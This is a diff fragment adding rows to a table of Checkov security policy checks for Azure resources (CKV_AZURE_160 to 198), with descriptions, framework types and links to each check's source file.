+| 2042 | CKV_AZURE_160            | resource                         | Microsoft.Network/networkSecurityGroups/securityRules                                            | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | Bicep                   | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                                                                   |
+| 2043 | CKV_AZURE_160            | resource                         | azurerm_network_security_group                                                                   | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | Terraform               | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py)                                                                       |
+| 2044 | CKV_AZURE_160            | resource                         | azurerm_network_security_rule                                                                    | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | Terraform               | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py)                                                                       |
+| 2045 | CKV_AZURE_161            | resource                         | azurerm_spring_cloud_api_portal                                                                  | Ensures Spring Cloud API Portal is enabled on for HTTPS                                                                                                                                                  | Terraform               | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py)                                                                   |
+| 2046 | CKV_AZURE_162            | resource                         | azurerm_spring_cloud_api_portal                                                                  | Ensures Spring Cloud API Portal Public Access Is Disabled                                                                                                                                                | Terraform               | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py)                                         |
+| 2047 | CKV_AZURE_163            | resource                         | Microsoft.ContainerRegistry/registries                                                           | Enable vulnerability scanning for container images.                                                                                                                                                      | arm                     | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRContainerScanEnabled.py)                                                                                           |
+| 2048 | CKV_AZURE_163            | resource                         | Microsoft.ContainerRegistry/registries                                                           | Enable vulnerability scanning for container images.                                                                                                                                                      | Bicep                   | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRContainerScanEnabled.py)                                                                                           |
+| 2049 | CKV_AZURE_163            | resource                         | azurerm_container_registry                                                                       | Enable vulnerability scanning for container images.                                                                                                                                                      | Terraform               | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py)                                                                               |
+| 2050 | CKV_AZURE_164            | resource                         | azurerm_container_registry                                                                       | Ensures that ACR uses signed/trusted images                                                                                                                                                              | Terraform               | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py)                                                                                         |
+| 2051 | CKV_AZURE_165            | resource                         | azurerm_container_registry                                                                       | Ensure geo-replicated container registries to match multi-region container deployments.                                                                                                                  | Terraform               | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py)                                                                                             |
+| 2052 | CKV_AZURE_166            | resource                         | Microsoft.ContainerRegistry/registries                                                           | Ensure container image quarantine, scan, and mark images verified                                                                                                                                        | arm                     | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableImageQuarantine.py)                                                                                         |
+| 2053 | CKV_AZURE_166            | resource                         | Microsoft.ContainerRegistry/registries                                                           | Ensure container image quarantine, scan, and mark images verified                                                                                                                                        | Bicep                   | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableImageQuarantine.py)                                                                                         |
+| 2054 | CKV_AZURE_166            | resource                         | azurerm_container_registry                                                                       | Ensure container image quarantine, scan, and mark images verified                                                                                                                                        | Terraform               | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py)                                                                             |
+| 2055 | CKV_AZURE_167            | resource                         | azurerm_container_registry                                                                       | Ensure a retention policy is set to cleanup untagged manifests.                                                                                                                                          | Terraform               | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py)                                                                             |
+| 2056 | CKV_AZURE_168            | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                                                                                                                      | arm                     | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py)                                                                                                       |
+| 2057 | CKV_AZURE_168            | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                                                                                                                      | Bicep                   | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py)                                                                                                       |
+| 2058 | CKV_AZURE_168            | resource                         | Microsoft.ContainerService/managedClusters/agentPools                                            | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                                                                                                                      | arm                     | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py)                                                                                                       |
+| 2059 | CKV_AZURE_168            | resource                         | Microsoft.ContainerService/managedClusters/agentPools                                            | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                                                                                                                      | Bicep                   | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py)                                                                                                       |
+| 2060 | CKV_AZURE_168            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                                                                                                                      | Terraform               | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py)                                                                                           |
+| 2061 | CKV_AZURE_168            | resource                         | azurerm_kubernetes_cluster_node_pool                                                             | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                                                                                                                      | Terraform               | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py)                                                                                           |
+| 2062 | CKV_AZURE_169            | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets                                                                                                                                               | arm                     | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSPoolTypeIsScaleSet.py)                                                                                               |
+| 2063 | CKV_AZURE_169            | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets                                                                                                                                               | Bicep                   | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSPoolTypeIsScaleSet.py)                                                                                               |
+| 2064 | CKV_AZURE_169            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets                                                                                                                                               | Terraform               | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py)                                                                                   |
+| 2065 | CKV_AZURE_170            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure that AKS use the Paid Sku for its SLA                                                                                                                                                             | Terraform               | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py)                                                                                                     |
+| 2066 | CKV_AZURE_171            | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS cluster upgrade channel is chosen                                                                                                                                                             | arm                     | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSUpgradeChannel.py)                                                                                                       |
+| 2067 | CKV_AZURE_171            | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS cluster upgrade channel is chosen                                                                                                                                                             | Bicep                   | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSUpgradeChannel.py)                                                                                                       |
+| 2068 | CKV_AZURE_171            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure AKS cluster upgrade channel is chosen                                                                                                                                                             | Terraform               | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py)                                                                                           |
+| 2069 | CKV_AZURE_172            | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters                                                                                                                                 | arm                     | [AkSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AkSSecretStoreRotation.py)                                                                                             |
+| 2070 | CKV_AZURE_172            | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters                                                                                                                                 | Bicep                   | [AkSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AkSSecretStoreRotation.py)                                                                                             |
+| 2071 | CKV_AZURE_172            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters                                                                                                                                 | Terraform               | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py)                                                                                 |
+| 2072 | CKV_AZURE_173            | resource                         | Microsoft.ApiManagement/service                                                                  | Ensure API management uses at least TLS 1.2                                                                                                                                                              | arm                     | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementMinTLS12.py)                                                                                               |
+| 2073 | CKV_AZURE_173            | resource                         | Microsoft.ApiManagement/service                                                                  | Ensure API management uses at least TLS 1.2                                                                                                                                                              | Bicep                   | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementMinTLS12.py)                                                                                               |
+| 2074 | CKV_AZURE_173            | resource                         | azurerm_api_management                                                                           | Ensure API management uses at least TLS 1.2                                                                                                                                                              | Terraform               | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py)                                                                                   |
+| 2075 | CKV_AZURE_174            | resource                         | Microsoft.ApiManagement/service                                                                  | Ensure API management public access is disabled                                                                                                                                                          | arm                     | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementPublicAccess.py)                                                                                       |
+| 2076 | CKV_AZURE_174            | resource                         | Microsoft.ApiManagement/service                                                                  | Ensure API management public access is disabled                                                                                                                                                          | Bicep                   | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementPublicAccess.py)                                                                                       |
+| 2077 | CKV_AZURE_174            | resource                         | azurerm_api_management                                                                           | Ensure API management public access is disabled                                                                                                                                                          | Terraform               | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py)                                                                           |
+| 2078 | CKV_AZURE_175            | resource                         | Microsoft.SignalRService/webPubSub                                                               | Ensure Web PubSub uses a SKU with an SLA                                                                                                                                                                 | arm                     | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSKUSLA.py)                                                                                                                 |
+| 2079 | CKV_AZURE_175            | resource                         | Microsoft.SignalRService/webPubSub                                                               | Ensure Web PubSub uses a SKU with an SLA                                                                                                                                                                 | Bicep                   | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSKUSLA.py)                                                                                                                 |
+| 2080 | CKV_AZURE_175            | resource                         | azurerm_web_pubsub                                                                               | Ensure Web PubSub uses a SKU with an SLA                                                                                                                                                                 | Terraform               | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py)                                                                                                     |
+| 2081 | CKV_AZURE_176            | resource                         | Microsoft.SignalRService/webPubSub                                                               | Ensure Web PubSub uses managed identities to access Azure resources                                                                                                                                      | arm                     | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSpecifyIdentity.py)                                                                                               |
+| 2082 | CKV_AZURE_176            | resource                         | Microsoft.SignalRService/webPubSub                                                               | Ensure Web PubSub uses managed identities to access Azure resources                                                                                                                                      | Bicep                   | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSpecifyIdentity.py)                                                                                               |
+| 2083 | CKV_AZURE_176            | resource                         | azurerm_web_pubsub                                                                               | Ensure Web PubSub uses managed identities to access Azure resources                                                                                                                                      | Terraform               | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py)                                                                                   |
+| 2084 | CKV_AZURE_177            | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure Windows VM enables automatic updates                                                                                                                                                              | arm                     | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py)                                                                                               |
+| 2085 | CKV_AZURE_177            | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure Windows VM enables automatic updates                                                                                                                                                              | Bicep                   | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py)                                                                                               |
+| 2086 | CKV_AZURE_177            | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure Windows VM enables automatic updates                                                                                                                                                              | arm                     | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py)                                                                                               |
+| 2087 | CKV_AZURE_177            | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure Windows VM enables automatic updates                                                                                                                                                              | Bicep                   | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py)                                                                                               |
+| 2088 | CKV_AZURE_177            | resource                         | azurerm_windows_virtual_machine                                                                  | Ensure Windows VM enables automatic updates                                                                                                                                                              | Terraform               | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py)                                                                                   |
+| 2089 | CKV_AZURE_177            | resource                         | azurerm_windows_virtual_machine_scale_set                                                        | Ensure Windows VM enables automatic updates                                                                                                                                                              | Terraform               | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py)                                                                                   |
+| 2090 | CKV_AZURE_178            | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure linux VM enables SSH with keys for secure communication                                                                                                                                           | arm                     | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py)                                                                                                             |
+| 2091 | CKV_AZURE_178            | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure linux VM enables SSH with keys for secure communication                                                                                                                                           | Bicep                   | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py)                                                                                                             |
+| 2092 | CKV_AZURE_178            | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure linux VM enables SSH with keys for secure communication                                                                                                                                           | arm                     | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py)                                                                                                             |
+| 2093 | CKV_AZURE_178            | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure linux VM enables SSH with keys for secure communication                                                                                                                                           | Bicep                   | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py)                                                                                                             |
+| 2094 | CKV_AZURE_178            | resource                         | azurerm_linux_virtual_machine                                                                    | Ensure linux VM enables SSH with keys for secure communication                                                                                                                                           | Terraform               | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py)                                                                                                 |
+| 2095 | CKV_AZURE_178            | resource                         | azurerm_linux_virtual_machine_scale_set                                                          | Ensure linux VM enables SSH with keys for secure communication                                                                                                                                           | Terraform               | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py)                                                                                                 |
+| 2096 | CKV_AZURE_179            | resource                         | azurerm_linux_virtual_machine                                                                    | Ensure VM agent is installed                                                                                                                                                                             | Terraform               | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                         |
+| 2097 | CKV_AZURE_179            | resource                         | azurerm_linux_virtual_machine_scale_set                                                          | Ensure VM agent is installed                                                                                                                                                                             | Terraform               | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                         |
+| 2098 | CKV_AZURE_179            | resource                         | azurerm_windows_virtual_machine                                                                  | Ensure VM agent is installed                                                                                                                                                                             | Terraform               | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                         |
+| 2099 | CKV_AZURE_179            | resource                         | azurerm_windows_virtual_machine_scale_set                                                        | Ensure VM agent is installed                                                                                                                                                                             | Terraform               | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                         |
+| 2100 | CKV_AZURE_180            | resource                         | azurerm_kusto_cluster                                                                            | Ensure that data explorer uses Sku with an SLA                                                                                                                                                           | Terraform               | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py)                                                                                   |
+| 2101 | CKV_AZURE_181            | resource                         | azurerm_kusto_cluster                                                                            | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely.                                                                                                              | Terraform               | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py)                                                                       |
+| 2102 | CKV_AZURE_182            | resource                         | Microsoft.Network/networkInterfaces                                                              | Ensure that VNET has at least 2 connected DNS Endpoints                                                                                                                                                  | arm                     | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py)                                                                                                   |
+| 2103 | CKV_AZURE_182            | resource                         | Microsoft.Network/networkInterfaces                                                              | Ensure that VNET has at least 2 connected DNS Endpoints                                                                                                                                                  | Bicep                   | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py)                                                                                                   |
+| 2104 | CKV_AZURE_182            | resource                         | Microsoft.Network/virtualNetworks                                                                | Ensure that VNET has at least 2 connected DNS Endpoints                                                                                                                                                  | arm                     | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py)                                                                                                   |
+| 2105 | CKV_AZURE_182            | resource                         | Microsoft.Network/virtualNetworks                                                                | Ensure that VNET has at least 2 connected DNS Endpoints                                                                                                                                                  | Bicep                   | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py)                                                                                                   |
+| 2106 | CKV_AZURE_182            | resource                         | azurerm_virtual_network                                                                          | Ensure that VNET has at least 2 connected DNS Endpoints                                                                                                                                                  | Terraform               | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py)                                                                                       |
+| 2107 | CKV_AZURE_182            | resource                         | azurerm_virtual_network_dns_servers                                                              | Ensure that VNET has at least 2 connected DNS Endpoints                                                                                                                                                  | Terraform               | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py)                                                                                       |
+| 2108 | CKV_AZURE_183            | resource                         | Microsoft.Network/virtualNetworks                                                                | Ensure that VNET uses local DNS addresses                                                                                                                                                                | arm                     | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetLocalDNS.py)                                                                                                                 |
+| 2109 | CKV_AZURE_183            | resource                         | Microsoft.Network/virtualNetworks                                                                | Ensure that VNET uses local DNS addresses                                                                                                                                                                | Bicep                   | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetLocalDNS.py)                                                                                                                 |
+| 2110 | CKV_AZURE_183            | resource                         | azurerm_virtual_network                                                                          | Ensure that VNET uses local DNS addresses                                                                                                                                                                | Terraform               | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py)                                                                                                     |
+| 2111 | CKV_AZURE_184            | resource                         | azurerm_app_configuration                                                                        | Ensure 'local_auth_enabled' is set to 'False'                                                                                                                                                            | Terraform               | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py)                                                                                         |
+| 2112 | CKV_AZURE_185            | resource                         | azurerm_app_configuration                                                                        | Ensure 'Public Access' is not Enabled for App configuration                                                                                                                                              | Terraform               | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py)                                                                                   |
+| 2113 | CKV_AZURE_186            | resource                         | azurerm_app_configuration                                                                        | Ensure App configuration encryption block is set.                                                                                                                                                        | Terraform               | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py)                                                                                       |
+| 2114 | CKV_AZURE_187            | resource                         | azurerm_app_configuration                                                                        | Ensure App configuration purge protection is enabled                                                                                                                                                     | Terraform               | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py)                                                                             |
+| 2115 | CKV_AZURE_188            | resource                         | azurerm_app_configuration                                                                        | Ensure App configuration Sku is standard                                                                                                                                                                 | Terraform               | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py)                                                                                                     |
+| 2116 | CKV_AZURE_189            | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure that Azure Key Vault disables public network access                                                                                                                                               | arm                     | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultDisablesPublicNetworkAccess.py)                                                                   |
+| 2117 | CKV_AZURE_189            | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure that Azure Key Vault disables public network access                                                                                                                                               | Bicep                   | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultDisablesPublicNetworkAccess.py)                                                                   |
+| 2118 | CKV_AZURE_189            | resource                         | azurerm_key_vault                                                                                | Ensure that Azure Key Vault disables public network access                                                                                                                                               | Terraform               | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py)                                                       |
+| 2119 | CKV_AZURE_190            | resource                         | azurerm_storage_account                                                                          | Ensure that Storage blobs restrict public access                                                                                                                                                         | Terraform               | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py)                                                               |
+| 2120 | CKV_AZURE_191            | resource                         | Microsoft.EventGrid/topics                                                                       | Ensure that Managed identity provider is enabled for Azure Event Grid Topic                                                                                                                              | arm                     | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicIdentityProviderEnabled.py)                                                               |
+| 2121 | CKV_AZURE_191            | resource                         | Microsoft.EventGrid/topics                                                                       | Ensure that Managed identity provider is enabled for Azure Event Grid Topic                                                                                                                              | Bicep                   | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicIdentityProviderEnabled.py)                                                               |
+| 2122 | CKV_AZURE_191            | resource                         | azurerm_eventgrid_topic                                                                          | Ensure that Managed identity provider is enabled for Azure Event Grid Topic                                                                                                                              | Terraform               | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py)                                                   |
+| 2123 | CKV_AZURE_192            | resource                         | Microsoft.EventGrid/topics                                                                       | Ensure that Azure Event Grid Topic local Authentication is disabled                                                                                                                                      | arm                     | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicLocalAuthentication.py)                                                                       |
+| 2124 | CKV_AZURE_192            | resource                         | Microsoft.EventGrid/topics                                                                       | Ensure that Azure Event Grid Topic local Authentication is disabled                                                                                                                                      | Bicep                   | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicLocalAuthentication.py)                                                                       |
+| 2125 | CKV_AZURE_192            | resource                         | azurerm_eventgrid_topic                                                                          | Ensure that Azure Event Grid Topic local Authentication is disabled                                                                                                                                      | Terraform               | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py)                                                           |
+| 2126 | CKV_AZURE_193            | resource                         | Microsoft.EventGrid/topics                                                                       | Ensure public network access is disabled for Azure Event Grid Topic                                                                                                                                      | arm                     | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicNetworkAccess.py)                                                                                   |
+| 2127 | CKV_AZURE_193            | resource                         | Microsoft.EventGrid/topics                                                                       | Ensure public network access is disabled for Azure Event Grid Topic                                                                                                                                      | Bicep                   | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicNetworkAccess.py)                                                                                   |
+| 2128 | CKV_AZURE_193            | resource                         | azurerm_eventgrid_topic                                                                          | Ensure public network access is disabled for Azure Event Grid Topic                                                                                                                                      | Terraform               | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py)                                                                       |
+| 2129 | CKV_AZURE_194            | resource                         | azurerm_eventgrid_domain                                                                         | Ensure that Managed identity provider is enabled for Azure Event Grid Domain                                                                                                                             | Terraform               | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py)                                                 |
+| 2130 | CKV_AZURE_195            | resource                         | azurerm_eventgrid_domain                                                                         | Ensure that Azure Event Grid Domain local Authentication is disabled                                                                                                                                     | Terraform               | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py)                                                         |
+| 2131 | CKV_AZURE_196            | resource                         | azurerm_signalr_service                                                                          | Ensure that SignalR uses a Paid Sku for its SLA                                                                                                                                                          | Terraform               | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py)                                                                                                   |
+| 2132 | CKV_AZURE_197            | resource                         | azurerm_cdn_endpoint                                                                             | Ensure the Azure CDN disables the HTTP endpoint                                                                                                                                                          | Terraform               | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py)                                                                               |
+| 2133 | CKV_AZURE_198            | resource                         | azurerm_cdn_endpoint                                                                             | Ensure the Azure CDN enables the HTTPS endpoint                                                                                                                                                          | Terraform               | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py)                                                                               |
